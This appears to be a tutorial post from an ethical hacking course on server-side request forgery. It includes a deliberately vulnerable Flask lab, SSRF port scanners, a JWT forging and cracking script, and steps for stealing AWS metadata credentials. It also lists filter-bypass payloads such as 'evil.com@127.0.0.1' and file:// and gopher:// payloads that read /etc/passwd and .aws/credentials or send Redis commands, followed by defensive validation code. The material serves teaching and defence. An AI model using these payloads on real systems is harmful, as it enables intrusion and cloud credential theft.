Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves
What will I learn
- What SSRF is and why it's one of the most dangerous modern web vulnerabilities;
- Basic SSRF: making the server request internal resources on your behalf;
- Blind SSRF: detecting SSRF when there's no visible response;
- Cloud metadata attacks: accessing AWS/GCP/Azure instance metadata via SSRF;
- Filter bypass techniques: URL parsing tricks, DNS rebinding, protocol smuggling;
- The Capital One breach (2019): how one SSRF led to 100 million stolen records.
Requirements
- A working modern computer running macOS, Windows or Ubuntu;
- Your hacking lab from Episode 2;
- Python 3 with requests and Flask (
pip install flask); - The ambition to learn ethical hacking and security research.
Difficulty
- Intermediate
Curriculum (of the Learn Ethical Hacking series):
- Learn Ethical Hacking (#1) - Why Hackers Win
- Learn Ethical Hacking (#2) - Your Hacking Lab
- Learn Ethical Hacking (#3) - How the Internet Actually Works - For Attackers
- Learn Ethical Hacking (#4) - Reconnaissance - The Art of Not Being Noticed
- Learn Ethical Hacking (#5) - Active Scanning - Mapping the Attack Surface
- Learn Ethical Hacking (#6) - The AI Slop Epidemic - Why AI-Generated Code Is a Security Disaster
- Learn Ethical Hacking (#7) - Passwords - Why Humans Are the Weakest Cipher
- Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
- Learn Ethical Hacking (#9) - Cryptography for Hackers - What Protects Data (and What Doesn't)
- Learn Ethical Hacking (#10) - The Vulnerability Lifecycle - From Discovery to Patch to Exploit
- Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection
- Learn Ethical Hacking (#12) - SQL Injection - The Bug That Won't Die
- Learn Ethical Hacking (#13) - SQL Injection Advanced - Extracting Entire Databases
- Learn Ethical Hacking (#14) - Cross-Site Scripting (XSS) - Injecting Code Into Browsers
- Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP
- Learn Ethical Hacking (#16) - Cross-Site Request Forgery - Making Users Attack Themselves
- Learn Ethical Hacking (#17) - Authentication Bypass - Getting In Without a Password
- Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves (this post)
Solutions to Episode 17 Exercises
Exercise 1 -- Hydra brute force:
# DVWA (Low): hydra finds admin:password in <1 second (first in wordlist)
# SSH Metasploitable2: msfadmin:msfadmin found in ~30 seconds
# DVWA Medium: adds CSRF token to login form.
# Hydra's basic http-get-form doesn't handle dynamic CSRF tokens.
# Need to: capture token with curl first, or use Burp Intruder
# which can extract tokens from responses between requests.
The key insight: CSRF tokens on login forms don't just prevent CSRF -- they also make automated brute force significantly harder. Each request needs a fresh token, breaking simple replay-based tools.
Exercise 2 -- JWT attack toolkit:
import jwt, json, base64, sys
def decode_jwt(token):
parts = token.split('.')
header = json.loads(base64.urlsafe_b64decode(parts[0] + '=='))
payload = json.loads(base64.urlsafe_b64decode(parts[1] + '=='))
return header, payload
def none_attack(payload_data):
return jwt.encode(payload_data, key="", algorithm="none")
def crack_secret(token, wordlist_path):
for line in open(wordlist_path, errors='replace'):
secret = line.strip()
try:
jwt.decode(token, secret, algorithms=["HS256"])
return secret
except jwt.InvalidSignatureError:
continue
return None
# Test: token = jwt.encode({"user":"guest"}, "secret123", algorithm="HS256")
# crack_secret(token, "rockyou.txt") -> "secret123" found in ~2 seconds
The key insight: JWTs are NOT encrypted -- the payload is visible to anyone. The signature only proves the token wasn't tampered with. If the secret is weak, the attacker can sign their own tokens.
Exercise 3 -- Three auth mechanisms compared:
Session-based: Most secure for server-rendered apps. Session data
stays server-side. Token is random, meaningless to attacker.
Weakness: if token generation is predictable, session hijacking.
JWT-based: Stateless, scalable. But token contains data readable by
client. Weakness: none-algorithm, weak secrets, can't invalidate
tokens server-side (until expiry).
Basic auth: Credentials sent with EVERY request (base64 encoded,
NOT encrypted). Over HTTP, trivially captured by any network
observer. Only safe over HTTPS. Weakest of the three.
Winner: session-based with cryptographically random tokens, HttpOnly
cookie, and session regeneration on login.
Learn Ethical Hacking (#18) - Server-Side Request Forgery
Every vulnerability we've covered so far exploits the relationship between the user and the application. SQL injection (episodes 12-13) abuses how the application talks to its database. XSS (episodes 14-15) abuses how the application talks to the browser. CSRF (episode 16) abuses how the browser talks to the application. Authentication bypass (episode 17) abuses how the application decides who you are. All of these share one thing: the attacker is on the outside, poking at the front door.
SSRF flips the model entirely. Instead of attacking the application from the outside, you make the application attack its OWN infrastructure from the inside. The server becomes your proxy. You feed it a URL, it fetches that URL for you, and suddenly you have access to internal services, metadata endpoints, databases, admin panels -- things that are completely invisible from the public internet but wide open from the server's perspective.
SSRF entered the OWASP Top 10 in 2021 as a brand new entry. Not because the vulnerability class was new (it wasn't), but because the explosion of cloud infrastructure made it devastating. When every server has access to a metadata endpoint that hands out AWS credentials to anyone who asks from 127.0.0.1... well. You can probably see where this is going ;-)
Hier we gaan.
The Fundamental Problem
Many web applications need to fetch external resources based on user input. URL preview features, image proxies, webhook deliveries, PDF generators, "import from URL" buttons, RSS feed readers -- all of these take a URL from the user and make an HTTP request to it on the server side:
# Vulnerable: fetches whatever URL the user provides
from flask import Flask, request
import requests
app = Flask(__name__)
@app.route('/fetch')
def fetch_url():
url = request.args.get('url')
resp = requests.get(url) # SSRF: server fetches attacker-controlled URL
return resp.text
Normal use: /fetch?url=https://example.com -- returns example.com's content. Perfectly reasonable feature.
Attacker's use: /fetch?url=http://localhost:8080/admin -- the SERVER requests its OWN admin panel (which is only accessible from localhost) and returns the content to the attacker.
See the problem? The application trusts itself. Internal services trust the server's IP address. Network firewalls protect the perimeter but don't restrict internal traffic. When you make the server send the request, all those protections evaporate. The request originates from inside the trusted network, from a trusted IP, and every internal service treats it as legitimate.
This is fundamentally different from everything we've covered before. With SQL injection, you exploit the application's trust in user input to the database. With SSRF, you exploit the network's trust in the application itself. The application isn't the target -- it's the weapon.
Building a Vulnerable Lab
Let's build an SSRF lab. Save this on your Kali VM as ssrf_lab.py:
#!/usr/bin/env python3
"""SSRF vulnerable application -- LAB ONLY."""
from flask import Flask, request
import requests
app = Flask(__name__)
# "Internal" service -- only accessible from localhost
@app.route('/internal/secrets')
def internal_secrets():
if request.remote_addr != '127.0.0.1':
return "Access denied", 403
return "SECRET_API_KEY=sk-12345-very-secret\nDB_PASSWORD=hunter2\nADMIN_TOKEN=eyJhbG...\n"
# "Internal" admin panel
@app.route('/internal/admin')
def internal_admin():
if request.remote_addr != '127.0.0.1':
return "Access denied", 403
return "Admin Panel
Users: 14,293
Revenue: $892,100
DB host: 10.0.0.5:5432
"
# "Public" feature -- URL preview with SSRF vulnerability
@app.route('/preview')
def preview():
url = request.args.get('url', '')
if not url:
return 'Preview'
try:
resp = requests.get(url, timeout=5)
return f"Preview of {url}
{resp.text[:2000]}"
except Exception as e:
return f"Error: {e}"
app.run(host='0.0.0.0', port=5000)
Start it and test:
python3 ssrf_lab.py &
# Normal use -- preview an external site
curl "http://localhost:5000/preview?url=http://example.com"
# SSRF -- access "internal only" secrets through the preview feature
curl "http://localhost:5000/preview?url=http://127.0.0.1:5000/internal/secrets"
# Returns: SECRET_API_KEY=sk-12345-very-secret
# SSRF -- access "internal only" admin panel
curl "http://localhost:5000/preview?url=http://127.0.0.1:5000/internal/admin"
# Returns: Admin Panel, Users: 14,293, Revenue: $892,100, DB host: 10.0.0.5:5432
The /internal/secrets endpoint checks that requests come from localhost. The preview feature runs ON localhost. So the SSRF request passes the IP check and the server happily returns the secrets. From the internal service's perspective, this is a perfectly legitimate local request. It has no way to know it was triggered by an external attacker.
Port Scanning via SSRF
Once you have SSRF, the server becomes your port scanner for the internal network. Instead of scanning from the outside (which firewalls would block), you scan from inside:
#!/usr/bin/env python3
"""SSRF-based internal port scanner. LAB ONLY."""
import requests
import time
target_url = "http://localhost:5000/preview"
internal_host = "127.0.0.1"
ports = [21, 22, 80, 443, 3306, 5000, 5432, 6379, 8080, 8443, 9200, 27017]
print(f"[*] Scanning {internal_host} via SSRF...")
for port in ports:
scan_url = f"http://{internal_host}:{port}/"
start = time.time()
try:
resp = requests.get(
f"{target_url}?url={scan_url}",
timeout=5
)
elapsed = time.time() - start
if "Error" not in resp.text:
print(f" [+] Port {port}: OPEN ({elapsed:.2f}s) -- got response")
elif elapsed < 1:
print(f" [?] Port {port}: possibly open ({elapsed:.2f}s) -- fast error")
else:
print(f" [-] Port {port}: closed ({elapsed:.2f}s)")
except requests.Timeout:
print(f" [-] Port {port}: filtered (timeout)")
except Exception as e:
print(f" [-] Port {port}: error ({e})")
python3 ssrf_scanner.py
# [*] Scanning 127.0.0.1 via SSRF...
# [+] Port 5000: OPEN (0.01s) -- got response
# [-] Port 22: closed (0.02s)
# [-] Port 3306: closed (0.03s)
In a real environment, you'd scan internal IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) looking for databases, caches, admin panels, monitoring systems -- anything that's firewalled from the outside but accessible from the application server. Finding a Redis instance (port 6379) or Elasticsearch (port 9200) without authentication on the internal network is extremely common. And once you can talk to those services through SSRF, you can read data, write data, and sometimes execute commands.
Cloud Metadata: The SSRF Gold Mine
This is where SSRF goes from "interesting vulnerability" to "company-ending catastrophe."
Every major cloud provider exposes an instance metadata service at a well-known internal IP address. This service provides credentials, configuration, and secrets to the running instance. It's intended for the instance itself to discover its own configuration at boot time -- what IAM role it has, what region it's in, what user-data was passed to it:
# AWS Instance Metadata Service (IMDSv1)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data/
# GCP Metadata Service
http://metadata.google.internal/computeMetadata/v1/
# (requires header: Metadata-Flavor: Google)
# Azure Metadata Service
http://169.254.169.254/metadata/instance?api-version=2021-02-01
# (requires header: Metadata: true)
169.254.169.254 is a link-local address -- it's not routable on the public internet, only accessible from within the cloud instance. But if you have SSRF on an application running in AWS, that link-local address is absolutely reachable:
# Step 1: Enumerate metadata categories
curl "http://vulnerable.com/preview?url=http://169.254.169.254/latest/meta-data/"
# Returns: ami-id, hostname, instance-type, local-ipv4, iam/...
# Step 2: Get the IAM role name
curl "http://vulnerable.com/preview?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# Returns: my-ec2-role
# Step 3: Get temporary AWS credentials for that role
curl "http://vulnerable.com/preview?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/my-ec2-role"
# Returns JSON with: AccessKeyId, SecretAccessKey, Token
# YOU NOW HAVE AWS API ACCESS WITH THAT ROLE'S PERMISSIONS
With those credentials, the attacker can do anything the IAM role allows -- list S3 buckets, read databases, launch EC2 instances, access secrets in AWS Secrets Manager, assume other roles. The credentials are temporary (they expire) but they can be refreshed via the same metadata endpoint as long as the SSRF vulnerability exists.
Having said that, GCP and Azure metadata services require specific headers (Metadata-Flavor: Google and Metadata: true respectively). Many SSRF vulnerabilities use HTTP client libraries that don't let the attacker control headers, which makes those services harder to exploit via basic SSRF. AWS IMDSv1 requires no special headers at all -- a bare GET request is enough. That's why AWS SSRF is the poster child for this attack class.
The Capital One Breach (2019)
This is not theoretical. This is EXACTLY how one of the largest data breaches in history happened.
Capital One ran their infrastructure on AWS. Their web application firewall (a ModSecurity-based WAF) had an SSRF vulnerability in its configuration. Paige Thompson (former AWS employee, handle "erratic") discovered the flaw in March 2019. The attack chain:
- Found SSRF in the WAF configuration endpoint
- Used SSRF to request
http://169.254.169.254/latest/meta-data/iam/security-credentials/ - Retrieved the WAF's IAM role name:
ISRM-WAF-Web-Role - Retrieved temporary AWS credentials for that role
- Used those credentials to list S3 buckets -- found over 700 buckets
- Downloaded data from buckets containing credit card applications
- Exfiltrated 100 million credit applications, 140,000 Social Security numbers, and 80,000 bank account numbers
One SSRF. One metadata endpoint. Zero authentication required. The total cost to Capital One: over $300 million in fines, settlements, and remediation. Thompson was convicted under the CFAA and sentenced to probation with time served (she had spent time in custody pre-trial).
The devastating part is how preventable it was. The IAM role attached to the WAF had far more permissions than it needed. It could list and read S3 buckets across the entire account. Under the principle of least privilege, a WAF needs to read its own configuration and write logs -- it has absolutely no business accessing customer data buckets. But overly permissive IAM policies are the norm, not the exception. "Just give it full S3 access, we'll lock it down later" -- and later never comes until the breach ;-)
Dat is why SSRF is in the OWASP Top 10 now.
Filter Bypass Techniques
Once developers realize SSRF is a problem, they try to filter URLs. "Just block requests to localhost and 169.254.169.254." Sounds reasonable. In practice, the number of ways to represent those addresses makes simple string-matching filters almost usless:
# Block "localhost" and "127.0.0.1"? Try these alternatives:
"http://127.0.0.1" # standard IPv4
"http://0.0.0.0" # all-interfaces address
"http://[::1]" # IPv6 localhost
"http://127.1" # shortened IPv4 (some parsers accept this)
"http://127.0.1" # another shortened form
"http://2130706433" # decimal representation of 127.0.0.1
"http://0x7f000001" # hexadecimal representation
"http://0177.0.0.1" # octal representation
"http://localtest.me" # public domain that resolves to 127.0.0.1
"http://spoofed.burpcollaborator.net" # attacker-controlled DNS
# Block "169.254.169.254"? Try:
"http://[0:0:0:0:0:ffff:169.254.169.254]" # IPv6 mapped IPv4
"http://169.254.169.254.nip.io" # DNS wildcard service
"http://2852039166" # decimal representation
"http://0xa9fea9fe" # hexadecimal
"http://0251.0376.0251.0376" # octal
URL parsing inconsistencies are another rich bypass vector. Different URL parsers disagree on how to interpret ambiguous URLs, and security filters often use a different parser than the HTTP client that actually makes the request:
# The security filter sees host="evil.com", the HTTP client sees host="127.0.0.1"
"http://evil.com@127.0.0.1" # userinfo before host
"http://127.0.0.1#@evil.com" # fragment tricks
"http://127.0.0.1%00@evil.com" # null byte in URL
"http://127.0.0.1:80@evil.com" # port in unexpected position
The @ character in URLs separates the "userinfo" (username:password) from the hostname. http://evil.com@127.0.0.1 means "connect to 127.0.0.1 with userinfo evil.com". Some URL parsers extract the hostname as evil.com (reading before the @), others as 127.0.0.1 (reading after the @). If the filter uses the first parser and the HTTP client uses the second, the filter sees a legitimate external domain while the request actually goes to localhost.
DNS rebinding is the most sophisticated bypass. The attacker controls a DNS server that responds with different IPs for the same domain:
- Application receives URL:
http://attacker-dns.com/path - Filter resolves
attacker-dns.com-- DNS server returns93.184.216.34(legitimate external IP). Filter says: "not internal, allow" - Application makes the actual HTTP request, resolves DNS again -- this time the attacker's DNS server returns
127.0.0.1 - Request goes to localhost
The filter checked the DNS at validation time. The HTTP client resolved DNS again at request time. Between those two moments, the attacker changed the DNS response. This is called a TOCTOU (time-of-check-time-of-use) vulnerability -- the check and the use happen at different times, and the attacker changes the state in between.
Defenses against DNS rebinding include pinning the resolved IP (resolve once, use that IP for the request), blocking DNS responses containing private IPs, and using DNS-over-HTTPS to prevent cache poisoning. But these are complex to implement correctly, and most applications don't bother.
Blind SSRF
Sometimes the server fetches the URL but doesn't show you the response. The preview page says "URL fetched successfully" regardless of what came back. Or maybe it only shows an image (for an image proxy feature) and your metadata endpoint returns JSON, so you see a broken image icon. The SSRF still exists -- you just can't see the response directly.
Blind SSRF is still dangerous. You can:
Out-of-band interaction: Point the URL to a server you control (Burp Collaborator, a VPS, or a simple HTTP listener) and check your access logs. If you get a hit from the target server's IP, SSRF is confirmed.
Timing-based detection: Internal hosts that exist respond faster than non-existent ones. If
http://10.0.0.1:3306/takes 0.05 seconds andhttp://10.0.0.1:9999/takes 5 seconds (timeout), port 3306 is probably open.Error-based detection: Different error messages for reachable vs unreachable hosts. "Connection refused" (host exists, port closed) vs "No route to host" (host doesn't exist).
#!/usr/bin/env python3
"""Blind SSRF port scanner via timing. LAB ONLY."""
import requests
import time
target = "http://localhost:5000/preview"
internal_range = "127.0.0.1"
print("[*] Blind SSRF port scan via timing differences...")
for port in [22, 80, 443, 3306, 5000, 5432, 6379, 8080, 8443, 9200]:
start = time.time()
try:
resp = requests.get(
f"{target}?url=http://{internal_range}:{port}/",
timeout=5
)
except:
pass
elapsed = time.time() - start
if elapsed < 1:
print(f" [+] Port {port}: likely OPEN (responded in {elapsed:.2f}s)")
elif elapsed < 3:
print(f" [?] Port {port}: uncertain ({elapsed:.2f}s)")
else:
print(f" [-] Port {port}: closed/filtered ({elapsed:.2f}s)")
Even without seeing the response content, blind SSRF lets you map the internal network (which hosts exist, which ports are open), confirm cloud metadata access (does the server make outbound DNS queries for 169.254.169.254?), and potentially exfiltrate data through DNS (encoding stolen data in subdomain queries: stolen-data.attacker.com).
Protocol Smuggling
SSRF doesn't have to be limited to HTTP. Depending on the HTTP client library, you might be able to use other URL schemes:
# File protocol -- read local files
/preview?url=file:///etc/passwd
/preview?url=file:///proc/self/environ
/preview?url=file:///home/webapp/.aws/credentials
# Gopher protocol -- send arbitrary TCP data (extremely powerful)
/preview?url=gopher://127.0.0.1:6379/_SET%20pwned%20true
# Dict protocol -- interact with dictionary services
/preview?url=dict://127.0.0.1:6379/INFO
The file:// protocol is straightforward -- it reads local files from the server's filesystem. If the SSRF supports it, you can read configuration files, credentials, SSH keys, environment variables (which often contain API keys and database passwords), and application source code.
The gopher:// protocol is the nuclear option. Gopher lets you send raw TCP data to any port. This means you can construct valid Redis commands, MySQL queries, SMTP emails, or any other TCP protocol and deliver them through the SSRF. A gopher-based SSRF to Redis can write arbitrary files to disk (via CONFIG SET dir and SAVE), which means RCE if you can write to a web-accessible directory or a crontab file.
Not all HTTP libraries support these protocols. Python's requests library only supports http:// and https://. But urllib supports file://, and some older or more permisive libraries support gopher://. Always test which protocols the target's HTTP client accepts -- it dramatically changes what you can do with the SSRF.
The AI Slop Angle
SSRF-vulnerable code is consistently generated by AI code assistants (continuing our thread from episodes 6, 12, 14, 16, and 17):
- URL fetch features with zero input validation --
requests.get(user_input)with no checks on the URL's scheme, host, or destination - Image proxy endpoints that accept any URL and fetch it server-side, intended for displaying images but exploitable for any HTTP request
- Webhook delivery systems where the user specifies the callback URL and the server POSTs to it without verifying the destination is external
- PDF/screenshot services that render user-supplied URLs using headless browsers, which often have access to internal network resources
- "Import from URL" features in content management systems and data tools
The pattern is the same one we've seen across every vulnerability class: the AI generates code that WORKS (the URL preview feature works, the image proxy works, the webhook system works) but doesn't consider what happens when the input is adversarial. Nobody asks "what if the user passes http://169.254.169.254/ instead of http://example.com/image.png?" during development. The feature works correctly for every legitimate use case. It only breaks when someone uses it the way it was NOT intended to be used -- which is exactly what attackers do ;-)
The Defense
Defending against SSRF properly requires multiple layers. Here's a comprehensive validation function:
from urllib.parse import urlparse
import ipaddress
import socket
BLOCKED_NETWORKS = [
ipaddress.ip_network('127.0.0.0/8'), # loopback
ipaddress.ip_network('10.0.0.0/8'), # private class A
ipaddress.ip_network('172.16.0.0/12'), # private class B
ipaddress.ip_network('192.168.0.0/16'), # private class C
ipaddress.ip_network('169.254.0.0/16'), # link-local (metadata!)
ipaddress.ip_network('0.0.0.0/8'), # "this network"
ipaddress.ip_network('100.64.0.0/10'), # carrier-grade NAT
ipaddress.ip_network('198.18.0.0/15'), # benchmarking
ipaddress.ip_network('::1/128'), # IPv6 loopback
ipaddress.ip_network('fc00::/7'), # IPv6 private
ipaddress.ip_network('fe80::/10'), # IPv6 link-local
]
ALLOWED_SCHEMES = ('http', 'https')
def is_safe_url(url):
"""Validate URL to prevent SSRF. Returns (safe, reason)."""
parsed = urlparse(url)
# Scheme check
if parsed.scheme not in ALLOWED_SCHEMES:
return False, f"Blocked scheme: {parsed.scheme}"
# Must have a hostname
if not parsed.hostname:
return False, "No hostname in URL"
# Resolve hostname to IP (prevents DNS rebinding partially)
try:
resolved_ip = socket.gethostbyname(parsed.hostname)
ip = ipaddress.ip_address(resolved_ip)
except (socket.gaierror, ValueError) as e:
return False, f"DNS resolution failed: {e}"
# Check against blocked ranges
for network in BLOCKED_NETWORKS:
if ip in network:
return False, f"IP {ip} is in blocked range {network}"
return True, "OK"
# Usage:
safe, reason = is_safe_url("http://169.254.169.254/latest/meta-data/")
print(f"Safe: {safe}, Reason: {reason}")
# Safe: False, Reason: IP 169.254.169.254 is in blocked range 169.254.0.0/16
This blocks the most common attacks. But it's NOT complete. DNS rebinding can still bypass this because the DNS resolution happens at validation time but the HTTP client may re-resolve the hostname when making the actual request. To fix that:
import requests
from urllib3.util.connection import allowed_gai_family
def fetch_url_safely(url):
"""Fetch a URL with SSRF protection -- resolve once, pin IP."""
safe, reason = is_safe_url(url)
if not safe:
return None, reason
parsed = urlparse(url)
resolved_ip = socket.gethostbyname(parsed.hostname)
# Pin the resolved IP -- make the request to the IP directly
# with the original Host header (so virtual hosts still work)
pinned_url = url.replace(parsed.hostname, resolved_ip)
headers = {'Host': parsed.hostname}
resp = requests.get(pinned_url, headers=headers, timeout=5,
allow_redirects=False) # don't follow redirects!
# If the server redirects, validate the redirect target too
if resp.is_redirect:
redirect_url = resp.headers.get('Location', '')
return fetch_url_safely(redirect_url) # recursive validation
return resp.text, "OK"
Note the allow_redirects=False. If you follow redirects automatically, the server can redirect your request to http://169.254.169.254/ AFTER passing the initial validation. Always validate redirect targets separately.
Beyond application-level defenses, the real fix for cloud metadata SSRF is AWS IMDSv2. IMDSv1 hands out credentials to any HTTP GET request from the instance. IMDSv2 requires a two-step process:
# IMDSv2: requires a session token first
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
# Then use that token in subsequent requests
curl "http://169.254.169.254/latest/meta-data/" \
-H "X-aws-ec2-metadata-token: $TOKEN"
The PUT request with a custom header can't be sent through a simple SSRF (most SSRF only allows GET requests, and custom headers like X-aws-ec2-metadata-token-ttl-seconds are typically not controllable by the attacker). IMDSv2 effectively blocks the classic SSRF-to-metadata attack vector. AWS now recommends IMDSv2 for all instances and provides the option to disable IMDSv1 entirely.
Having said that, many organizations still run IMDSv1 either because they haven't migrated, because legacy applications depend on it, or because they don't know it's a problem. The Capital One breach happened in 2019 -- IMDSv2 was released in November 2019, partly in response to that exact breach. It's 2026 now and the migration is still incomplete across the industry.
Putting It All Together: The SSRF Attack Methodology
- Identify URL-handling features: URL preview, image proxy, webhooks, PDF generation, import-from-URL, RSS feeds, API integrations that fetch external data
- Test basic SSRF: Try
http://127.0.0.1,http://localhost, andhttp://169.254.169.254as input. Check if the response contains internal data - Test filter bypasses: If basic addresses are blocked, try decimal IPs, hex IPs, IPv6, DNS wildcards, URL parsing tricks
- Enumerate internal services: Use SSRF to port-scan internal ranges (10.x.x.x, 172.16.x.x, 192.168.x.x)
- Attack cloud metadata: If the application runs in AWS/GCP/Azure, try the metadata endpoints. Check for IMDSv1 vs IMDSv2
- Test protocol handlers: Try
file://,gopher://,dict://-- different protocols unlock different attack capabilities - Check for blind SSRF: If you can't see responses, use out-of-band detection (Burp Collaborator, DNS canaries)
- Escalate access: Cloud credentials from metadata can be used to access storage, databases, other services. Internal admin panels may have further vulnerabilities.
We've been working through application-level web vulnerabilities since episode 11. SQL injection, XSS, CSRF, authentication bypass, and now SSRF -- each one exploits a different trust boundary, and each one chains with the others. The web attack surface is a layered system where every vulnerability class multiplies the impact of every other class. Applications don't just process data -- they handle data in complex formats, accept structured input that can carry payloads, and trust that the data they receive is what it claims to be.
Exercises
Exercise 1: Set up the SSRF vulnerable Flask application from this episode. Exploit it to: (a) read the /internal/secrets endpoint, (b) scan ports 80, 22, 3306, 5432, 8080 on the local machine using the timing-based approach (check which respond vs timeout), (c) attempt to read a local file using the file:// protocol (?url=file:///etc/passwd). Document which attacks succeeded and which were blocked by the requests library's default behavior. Save your findings in ~/lab-notes/ssrf-attacks.md.
Exercise 2: Add SSRF protection to the vulnerable Flask app: implement the is_safe_url() function from this episode. Then test ALL the bypass techniques listed (IPv6, decimal IP, DNS wildcard services, URL parsing tricks). Which bypasses still work? Which are blocked? Identify the remaining gaps in the protection and propose additional defenses. Save the hardened app as ~/ssrf-lab/ssrf_protected.py.
Exercise 3: Research the Capital One breach (2019) in detail. Write a technical analysis in ~/lab-notes/capital-one-ssrf.md covering: (a) the exact attack chain from SSRF to data exfiltration, (b) what AWS IMDSv2 is and how it would have prevented the attack, (c) what IAM permissions the compromised role had (and what it should have had under the principle of least privilege), (d) what the total financial and legal cost was. Conclude with: what three changes would have prevented this breach?